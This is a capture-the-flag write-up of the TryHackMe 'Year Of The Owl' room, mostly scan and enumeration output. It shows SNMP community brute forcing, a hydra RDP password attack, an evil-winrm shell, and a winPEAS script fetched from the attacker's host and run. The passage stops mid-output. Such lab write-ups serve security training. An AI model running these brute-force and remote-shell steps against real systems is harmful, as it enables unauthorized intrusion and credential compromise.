TryHackMe: Year Of The Owl https://tryhackme.com/room/yearoftheowl by MuirlandOracle

Enumeration

Lets fire off rustscan

$ rustscan -a owl -- -sC -sV -A -oA yearoftheowl -v
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.128.205:80
Open 10.10.128.205:139
Open 10.10.128.205:443
Open 10.10.128.205:445
Open 10.10.128.205:3306
Open 10.10.128.205:3389
Open 10.10.128.205:5985
Open 10.10.128.205:47001
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-30 23:20 GMT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:20
Completed NSE at 23:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:20
Completed NSE at 23:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:20
Completed NSE at 23:20, 0.00s elapsed
Initiating Ping Scan at 23:20
Scanning 10.10.128.205 [2 ports]
Completed Ping Scan at 23:20, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 23:20
Scanning yearoftheowl (10.10.128.205) [8 ports]
Discovered open port 139/tcp on 10.10.128.205
Discovered open port 443/tcp on 10.10.128.205
Discovered open port 80/tcp on 10.10.128.205
Discovered open port 3389/tcp on 10.10.128.205
Discovered open port 445/tcp on 10.10.128.205
Discovered open port 3306/tcp on 10.10.128.205
Discovered open port 5985/tcp on 10.10.128.205
Discovered open port 47001/tcp on 10.10.128.205
Completed Connect Scan at 23:20, 0.03s elapsed (8 total ports)
Initiating Service scan at 23:20
Scanning 8 services on yearoftheowl (10.10.128.205)
Completed Service scan at 23:20, 12.19s elapsed (8 services on 1 host)
NSE: Script scanning 10.10.128.205.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:20
NSE Timing: About 99.91% done; ETC: 23:21 (0:00:00 remaining)
Completed NSE at 23:21, 40.30s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.43s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
Nmap scan report for yearoftheowl (10.10.128.205)
Host is up, received syn-ack (0.035s latency).
Scanned at 2020-11-30 23:20:18 GMT for 53s

PORT      STATE SERVICE       REASON  VERSION
80/tcp    open  http          syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after:  2019-11-08T23:48:47
| MD5:   a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
| SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds? syn-ack
3306/tcp  open  mysql?        syn-ack
| fingerprint-strings: 
|   FourOhFourRequest, GenericLines, NULL: 
|_    Host 'ip-10-9-5-198.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
| mysql-info: 
|_  MySQL Error: Host 'ip-10-9-5-198.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: YEAR-OF-THE-OWL
|   NetBIOS_Domain_Name: YEAR-OF-THE-OWL
|   NetBIOS_Computer_Name: YEAR-OF-THE-OWL
|   DNS_Domain_Name: year-of-the-owl
|   DNS_Computer_Name: year-of-the-owl
|   Product_Version: 10.0.17763
|_  System_Time: 2020-11-30T23:20:31+00:00
| ssl-cert: Subject: commonName=year-of-the-owl
| Issuer: commonName=year-of-the-owl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-16T19:04:21
| Not valid after:  2021-03-18T19:04:21
| MD5:   a4ad f32c 5473 eee3 2d2c ca88 c231 7879
| SHA-1: 1824 b248 b428 857e 8ce6 f1f3 d60d 333a d679 5c5b
| -----BEGIN CERTIFICATE-----
| MIIC4jCCAcqgAwIBAgIQFnYpvP/X27lLNvLGGW6FnDANBgkqhkiG9w0BAQsFADAa
| MRgwFgYDVQQDEw95ZWFyLW9mLXRoZS1vd2wwHhcNMjAwOTE2MTkwNDIxWhcNMjEw
| MzE4MTkwNDIxWjAaMRgwFgYDVQQDEw95ZWFyLW9mLXRoZS1vd2wwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQC3636hkJl+hlDY3UMk/U1JJ3wW8JvIyrAI
| KWgFuf5+VzSW9Jtsjmvvoon3wPMbRc2K7RbEn/WfnQGP1m2UaA8lDrpFkDAE7+FZ
| tJFgjGkIys8YzcxdRGD5stzeSotytSVt/zgVyci67yJCBcihoyp5+w05OBFaYQWa
| U2VT1QpdijRqqTPcTx6CVgHJzgwRVUXvrPaOcfM2DZOF2knhEmuBBpMwEJCh/sqB
| pezD5/PDJ+5bC6CVj5gJCJXULr8nGR7DZnfyR+uwGnDoRXl/7jWSdGhprwbo1v/M
| iU8BuKT1vZuF7dXRACTlLHlsqqtEh0d3wMLnmWvTGNYQc8wS6VuVAgMBAAGjJDAi
| MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsF
| AAOCAQEAISrU6a8Nhh2IWZkgdeczge0rxk8e2pSxp0vwWfF2sVhvrMV3m/d2Sm7i
| oUwc3tToj7Sgns/KMrTzEq7KPgIRlTDung/TQtv/Rs0T+SdQZAVp+tWZVSOu3jkA
| XFowMSV+TgoHSvfKv8xsGJvqjUW6sGGD69g22ruUrVQA9ipk4nT5BKJ1nTmd3XvA
| 7+WnNpZ7LfZT/7dws1IZp5TrbIj2tEUyJP8rA4UzMwcp6KM5c0Z7S0X82Z0WPRVk
| XaZWU3Ypqx+eE2Nn1Cb8yHUgQwc1bzx7r+aMiqdFATAybYXVgJjNNNq1VsMOFMnO
| qaEfWPcd+z1+jDQPhfdLPgLIjytp8g==
|_-----END CERTIFICATE-----
|_ssl-date: 2020-11-30T23:21:11+00:00; 0s from scanner time.
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=11/30%Time=5FC57E32%P=x86_64-pc-linux-gnu%r(N
SF:ULL,67,"c\0\0\x01\xffj\x04Host\x20'ip-10-9-5-198\.eu-west-1\.compute\.i
SF:nternal'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mari
SF:aDB\x20server")%r(GenericLines,67,"c\0\0\x01\xffj\x04Host\x20'ip-10-9-5
SF:-198\.eu-west-1\.compute\.internal'\x20is\x20not\x20allowed\x20to\x20co
SF:nnect\x20to\x20this\x20MariaDB\x20server")%r(FourOhFourRequest,67,"c\0\
SF:0\x01\xffj\x04Host\x20'ip-10-9-5-198\.eu-west-1\.compute\.internal'\x20
SF:is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20serve
SF:r");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 24626/tcp): CLEAN (Timeout)
|   Check 2 (port 51517/tcp): CLEAN (Timeout)
|   Check 3 (port 26276/udp): CLEAN (Timeout)
|   Check 4 (port 47591/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-30T23:20:35
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.65 seconds

80 - HTTP

Redirects to www.******** so updated /etc/hosts and get the below

Just an owl.... nothing hidden with steg....

443 - HTTPS

HTTPS appears to be the same as HTTP, nothing different from first glance...

139 - RPC / 445 - SMB

enum4linux, smbclient and thunar not bringing anything back...

3306 - MySQL

No access

3389 - MS RDP

No access

5985 - HTTPAPI

Nothing to see here ...

47001 - HTTPAPI

Nothing to see here ...

Flag1

User Flag

Tried all sorts against the various servers without any joy and then got the hint udp ...... tried scanning for open UDP ports and trying a few different things.... but after a couple of extends on the box RAGE QUIT

QUIT

..... picking it back up and finding out it was snmp I run onesixtyone to find the community string

╰─⠠⠵ onesixtyone  10.10.24.181 -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt
Scanning 1 hosts, 3219 communities
10.10.24.181 [openview] Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)

Then snmp-check to enumerate the snmp

╰─⠠⠵ snmp-check 10.10.24.181 -c openview
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.24.181:161 using SNMPv1 and community 'openview'

[*] System information:

  Host IP address               : 10.10.24.181
  Hostname                      : year-of-the-owl
  Description                   : Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
  Contact                       : -
  Location                      : -
  Uptime snmp                   : 00:05:43.68
  Uptime system                 : 00:04:46.45
  System date                   : 2021-2-14 23:45:37.3
  Domain                        : WORKGROUP

[*] User accounts:

  Guest               
  [REDACTED]              
  Administrator       
  DefaultAccount      
  WDAGUtilityAccount  

[*] Network information:

  IP forwarding enabled         : no
  Default TTL                   : 128
  TCP segments received         : 63
  TCP segments sent             : 99
  TCP segments retrans          : 71
  Input datagrams               : 3361
  Delivered datagrams           : 3437
  Output datagrams              : 278

[*] Network interfaces:

  Interface                     : [ up ] Software Loopback Interface 1
  Id                            : 1
  Mac Address                   : :::::
  Type                          : softwareLoopback
  Speed                         : 1073 Mbps
  MTU                           : 1500
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Microsoft 6to4 Adapter
  Id                            : 2
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Microsoft IP-HTTPS Platform Adapter
  Id                            : 3
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Microsoft Kernel Debug Network Adapter
  Id                            : 4
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Intel(R) 82574L Gigabit Network Connection
  Id                            : 5
  Mac Address                   : 00:0c:29:02:45:89
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Microsoft Teredo Tunneling Adapter
  Id                            : 6
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] AWS PV Network Device #0
  Id                            : 7
  Mac Address                   : 02:4f:09:70:3a:af
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 9001
  In octets                     : 295983
  Out octets                    : 29788

  Interface                     : [ up ] AWS PV Network Device #0-WFP Native MAC Layer LightWeight Filter-0000
  Id                            : 8
  Mac Address                   : 02:4f:09:70:3a:af
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 9001
  In octets                     : 295983
  Out octets                    : 29788

  Interface                     : [ up ] AWS PV Network Device #0-QoS Packet Scheduler-0000
  Id                            : 9
  Mac Address                   : 02:4f:09:70:3a:af
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 9001
  In octets                     : 295983
  Out octets                    : 29788

  Interface                     : [ up ] AWS PV Network Device #0-WFP 802.3 MAC Layer LightWeight Filter-0000
  Id                            : 10
  Mac Address                   : 02:4f:09:70:3a:af
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 9001
  In octets                     : 295983
  Out octets                    : 29788


[*] Network IP:

  Id                    IP Address            Netmask               Broadcast           
  7                     10.10.24.181          255.255.0.0           1                   
  1                     127.0.0.1             255.0.0.0             1                   

[*] Routing information:

  Destination           Next hop              Mask                  Metric              
  0.0.0.0               10.10.0.1             0.0.0.0               25                  
  10.10.0.0             10.10.24.181          255.255.0.0           281                 
  10.10.24.181          10.10.24.181          255.255.255.255       281                 
  10.10.255.255         10.10.24.181          255.255.255.255       281                 
  127.0.0.0             127.0.0.1             255.0.0.0             331                 
  127.0.0.1             127.0.0.1             255.255.255.255       331                 
  127.255.255.255       127.0.0.1             255.255.255.255       331                 
  169.254.169.123       10.10.0.1             255.255.255.255       50                  
  169.254.169.249       10.10.0.1             255.255.255.255       50                  
  169.254.169.250       10.10.0.1             255.255.255.255       50                  
  169.254.169.251       10.10.0.1             255.255.255.255       50                  
  169.254.169.253       10.10.0.1             255.255.255.255       50                  
  169.254.169.254       10.10.0.1             255.255.255.255       50                  
  224.0.0.0             127.0.0.1             240.0.0.0             331                 
  255.255.255.255       127.0.0.1             255.255.255.255       331                 

[*] TCP connections and listening ports:

  Local address         Local port            Remote address        Remote port           State               
  0.0.0.0               80                    0.0.0.0               0                     listen              
  0.0.0.0               135                   0.0.0.0               0                     listen              
  0.0.0.0               443                   0.0.0.0               0                     listen              
  0.0.0.0               445                   0.0.0.0               0                     listen              
  0.0.0.0               3306                  0.0.0.0               0                     listen              
  0.0.0.0               3389                  0.0.0.0               0                     listen              
  0.0.0.0               5985                  0.0.0.0               0                     listen              
  0.0.0.0               47001                 0.0.0.0               0                     listen              
  0.0.0.0               49664                 0.0.0.0               0                     listen              
  0.0.0.0               49665                 0.0.0.0               0                     listen              
  0.0.0.0               49666                 0.0.0.0               0                     listen              
  0.0.0.0               49667                 0.0.0.0               0                     listen              
  0.0.0.0               49668                 0.0.0.0               0                     listen              
  0.0.0.0               49669                 0.0.0.0               0                     listen              
  10.10.24.181          139                   0.0.0.0               0                     listen              
  10.10.24.181          49717                 138.91.136.108        443                   synSent             
  10.10.24.181          49718                 52.152.110.14         443                   synSent             
  10.10.24.181          49719                 23.195.139.83         443                   synSent             

[*] Listening UDP ports:

  Local address         Local port          
  0.0.0.0               123                 
  0.0.0.0               161                 
  0.0.0.0               3389                
  0.0.0.0               5353                
  0.0.0.0               5355                
  10.10.24.181          137                 
  10.10.24.181          138                 
  127.0.0.1             63761               

[*] Network services:

  Index                 Name                
  0                     Power               
  1                     mysql               
  2                     Server              
  3                     Themes              
  4                     SysMain             
  5                     Apache2.4           
  6                     IP Helper           
  7                     DNS Client          
  8                     DHCP Client         
  9                     Time Broker         
  10                    Workstation         
  11                    SNMP Service        
  12                    User Manager        
  13                    Windows Time        
  14                    CoreMessaging       
  15                    Plug and Play       
  16                    Print Spooler       
  17                    Task Scheduler      
  18                    Windows Update      
  19                    Remote Registry     
  20                    Amazon SSM Agent    
  21                    CNG Key Isolation   
  22                    COM+ Event System   
  23                    Windows Event Log   
  24                    IPsec Policy Agent  
  25                    Group Policy Client 
  26                    RPC Endpoint Mapper 
  27                    Web Account Manager 
  28                    AWS Lite Guest Agent
  29                    Device Setup Manager
  30                    Network List Service
  31                    System Events Broker
  32                    User Profile Service
  33                    Base Filtering Engine
  34                    Local Session Manager
  35                    TCP/IP NetBIOS Helper
  36                    Cryptographic Services
  37                    Certificate Propagation
  38                    Remote Desktop Services
  39                    Shell Hardware Detection
  40                    State Repository Service
  41                    Diagnostic Policy Service
  42                    Network Connection Broker
  43                    Security Accounts Manager
  44                    Windows Defender Firewall
  45                    Network Location Awareness
  46                    Windows Connection Manager
  47                    Windows Font Cache Service
  48                    Remote Procedure Call (RPC)
  49                    Update Orchestrator Service
  50                    User Access Logging Service
  51                    DCOM Server Process Launcher
  52                    Remote Desktop Configuration
  53                    Network Store Interface Service
  54                    Client License Service (ClipSVC)
  55                    Distributed Link Tracking Client
  56                    AppX Deployment Service (AppXSVC)
  57                    System Event Notification Service
  58                    Connected Devices Platform Service
  59                    Windows Defender Antivirus Service
  60                    Windows Management Instrumentation
  61                    Distributed Transaction Coordinator
  62                    Microsoft Account Sign-in Assistant
  63                    Background Tasks Infrastructure Service
  64                    Connected User Experiences and Telemetry
  65                    WinHTTP Web Proxy Auto-Discovery Service
  66                    Windows Push Notifications System Service
  67                    Windows Remote Management (WS-Management)
  68                    Remote Desktop Services UserMode Port Redirector
  69                    Windows Defender Antivirus Network Inspection Service

[*] Processes:

  Id                    Status                Name                  Path                  Parameters          
  1                     running               System Idle Process                                             
  4                     running               System                                                          
  68                    running               Registry                                                        
  412                   running               smss.exe                                                        
  504                   running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted -p
  512                   running               dwm.exe                                                         
  568                   running               csrss.exe                                                       
  640                   running               svchost.exe           C:\Windows\system32\  -k netsvcs -p       
  644                   running               csrss.exe                                                       
  660                   running               wininit.exe                                                     
  704                   running               winlogon.exe                                                    
  764                   running               svchost.exe           C:\Windows\System32\  -k LocalSystemNetworkRestricted -p
  768                   running               services.exe                                                    
  788                   running               lsass.exe             C:\Windows\system32\                      
  848                   running               svchost.exe           C:\Windows\System32\  -k termsvcs         
  884                   running               svchost.exe           C:\Windows\system32\  -k DcomLaunch -p    
  904                   running               fontdrvhost.exe                                                 
  912                   running               fontdrvhost.exe                                                 
  980                   running               svchost.exe           C:\Windows\system32\  -k RPCSS -p         
  1124                  running               amazon-ssm-agent.exe  C:\Program Files\Amazon\SSM\                      
  1136                  running               upfc.exe                                                        
  1188                  running               svchost.exe           C:\Windows\system32\  -k LocalService -p  
  1276                  running               svchost.exe           C:\Windows\System32\  -k NetworkService -p
  1308                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceNetworkRestricted -p
  1380                  running               LiteAgent.exe         C:\Program Files\Amazon\XenTools\                      
  1396                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceNoNetworkFirewall -p
  1488                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceNoNetwork -p
  1744                  running               svchost.exe           C:\Windows\system32\  -k netsvcs          
  1868                  running               spoolsv.exe           C:\Windows\System32\                      
  1904                  running               svchost.exe           C:\Windows\System32\  -k utcsvc -p        
  1984                  running               svchost.exe           C:\Windows\system32\  -k LocalService     
  2016                  running               MsMpEng.exe                                                     
  2040                  running               snmp.exe              C:\Windows\System32\                      
  2052                  running               httpd.exe             C:\xampp\apache\bin\  -k runservice       
  2084                  running               mysqld.exe            C:\xampp\mysql\bin\   --defaults-file=c:\xampp\mysql\bin\my.ini mysql
  2104                  running               svchost.exe           C:\Windows\System32\  -k smbsvcs          
  2324                  running               svchost.exe           C:\Windows\system32\  -k NetworkServiceNetworkRestricted -p
  2836                  running               LogonUI.exe                                 /flags:0x2 /state0:0xa3a7c855 /state1:0x41c64e6d
  3028                  running               httpd.exe             C:\xampp\apache\bin\  -d C:/xampp/apache  
  3708                  running               svchost.exe                                                     
  3748                  running               MpCmdRun.exe          C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\  SignatureUpdate -ScheduleJob -RestrictPrivileges -Reinvoke
  3936                  running               NisSrv.exe                                                      
  4408                  running               svchost.exe           C:\Windows\system32\  -k appmodel -p      
  4572                  running               msdtc.exe             C:\Windows\System32\                      
  4948                  running               MpCmdRun.exe          C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\  SignaturesUpdateService -ScheduleJob -HttpDownload -RestrictPrivileges -Reinvoke
  5052                  running               WmiPrvSE.exe          C:\Windows\system32\wbem\                      

[*] Storage information:

  Description                   : ["C:\\ Label:  Serial Number 7c0c3814"]
  Device id                     : [#<SNMP::Integer:0x000055f7ab447e30 @value=1>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x000055f7ab442818 @value=4096>]
  Memory size                   : 19.46 GB
  Memory used                   : 15.49 GB

  Description                   : ["Virtual Memory"]
  Device id                     : [#<SNMP::Integer:0x000055f7ab3e37f0 @value=2>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x000055f7ab2d1808 @value=65536>]
  Memory size                   : 3.12 GB
  Memory used                   : 837.56 MB

  Description                   : ["Physical Memory"]
  Device id                     : [#<SNMP::Integer:0x000055f7ab756220 @value=3>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x000055f7ab7543d0 @value=65536>]
  Memory size                   : 2.00 GB
  Memory used                   : 750.62 MB


[*] File system information:

  Index                         : 1
  Mount point                   : 
  Remote mount point            : -
  Access                        : 1
  Bootable                      : 0

[*] Device information:

  Id                    Type                  Status                Descr               
  1                     unknown               running               Microsoft XPS Document Writer v4
  2                     unknown               running               Microsoft Print To PDF
  3                     unknown               running               Unknown Processor Type
  4                     unknown               unknown               Software Loopback Interface 1
  5                     unknown               unknown               Microsoft 6to4 Adapter
  6                     unknown               unknown               Microsoft IP-HTTPS Platform Adapter
  7                     unknown               unknown               Microsoft Kernel Debug Network Adapter
  8                     unknown               unknown               Intel(R) 82574L Gigabit Network Connection
  9                     unknown               unknown               Microsoft Teredo Tunneling Adapter
  10                    unknown               unknown               AWS PV Network Device #0
  11                    unknown               unknown               AWS PV Network Device #0-WFP Native MAC Layer LightWeight Filter
  12                    unknown               unknown               AWS PV Network Device #0-QoS Packet Scheduler-0000
  13                    unknown               unknown               AWS PV Network Device #0-WFP 802.3 MAC Layer LightWeight Filter-
  14                    unknown               running               Fixed Disk          
  15                    unknown               running               Fixed Disk          
  16                    unknown               running               IBM enhanced (101- or 102-key) keyboard, Subtype=(0)
  17                    unknown               unknown               COM1:               

[*] Software components:

  Index                 Name                
  1                     XAMPP               
  2                     Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.11.25325
  3                     Microsoft Visual C++ 2017 x64 Additional Runtime - 14.11.25325
  4                     Amazon SSM Agent    
  5                     Amazon SSM Agent    
  6                     Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325

From the above we have the following useful information

[*] System information:

  Host IP address               : 10.10.24.181
  Hostname                      : year-of-the-owl
  Domain                        : WORKGROUP

[*] User accounts:

  Guest               
  [REDACTED]              
  Administrator       
  DefaultAccount      
  WDAGUtilityAccount  

OK, we have a username to try to enumerate [REDACTED]... Let's run hydra and see if we can brute force it

╰─⠠⠵ hydra -l [REDACTED] -P /usr/share/wordlists/rockyou.txt owl rdp   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-02-14 23:50:27
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344400 login tries (l:1/p:14344400), ~3586100 tries per task
[DATA] attacking rdp://owl:3389/
[3389][rdp] account on 10.10.24.181 might be valid but account not active for remote desktop: login: [REDACTED] password: [REDACTED], continuing attacking the account.

Hmmm, hydra reports a password but RDP throws an error...

Ok, if rdp does not work lets try something else ... Using evil-winrm we get a shell

╰─⠠⠵ evil-winrm -i owl -u [REDACTED]
Enter Password: 

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\[REDACTED]\Documents> 

Navigating to C:\users\[REDACTED]\desktop we can use gc to read the content of user.txt

*Evil-WinRM* PS C:\users\[REDACTED]\Documents> cd C:\users\[REDACTED]\desktop
*Evil-WinRM* PS C:\users\[REDACTED]\desktop> gc user.txt
[REDACTED]

Flag2

Admin Flag

Ok, now that we on the box we need to privesc, let's grab winPEAS.bat and run it

> invoke-webrequest 'http://10.9.5.198:9999/winPEAS.bat' -out peas.bat

> .\peas.bat

            ((,.,/((((((((((((((((((((/,  */
                                
 [+] SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS                                                                         
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services                                       
peas.bat : ERROR:               
    + CategoryInfo          : NotSpecified: (ERROR::String) [], RemoteException                                              
    + FullyQualifiedErrorId : NativeCommandError                                                                             
Description = Access denied     
 [+] CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY                                                                            
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services                                       
                                
 [+] UNQUOTED SERVICE PATHS     
   [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'         
   [i] The permissions are also checked and filtered using icacls                                                            
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services                                       
                                
[*] DLL HIJACKING in PATHenv variable                                                                                        
   [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations                     
   [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate                              
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking                                  
C:\Windows\system32 NT SERVICE\TrustedInstaller:(F)                                                                          
                                
C:\Windows NT SERVICE\TrustedInstaller:(F)                                                                                   
                                
C:\Windows\System32\Wbem NT SERVICE\TrustedInstaller:(F)                                                                     
                                
C:\Users\[REDACTED]\AppData\Local\Microsoft\WindowsApps NT AUTHORITY\SYSTEM:(OI)(CI)(F)                                          
                                                    YEAR-OF-THE-OWL\[REDACTED]:(OI)(CI)(F)                                       
                                
                                
[*] CREDENTIALS                 
                                
 [+] WINDOWS VAULT              
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault                                  
                                
Currently stored credentials:   
                                
* NONE *                        
                                
                                
 [+] Unattended files           
                                
 [+] SAM and SYSTEM backups     
                                
 [+] McAffee SiteList.xml
 Volume in drive C has no label.
 Volume Serial Number is 7C0C-3814
 Volume in drive C has no label.
 Volume Serial Number is 7C0C-3814 
 Volume in drive C has no label.
 Volume Serial Number is 7C0C-3814
 Volume in drive C has no label.
 Volume Serial Number is 7C0C-3814
 
 ..
 ..
 ..
 ..
 ..
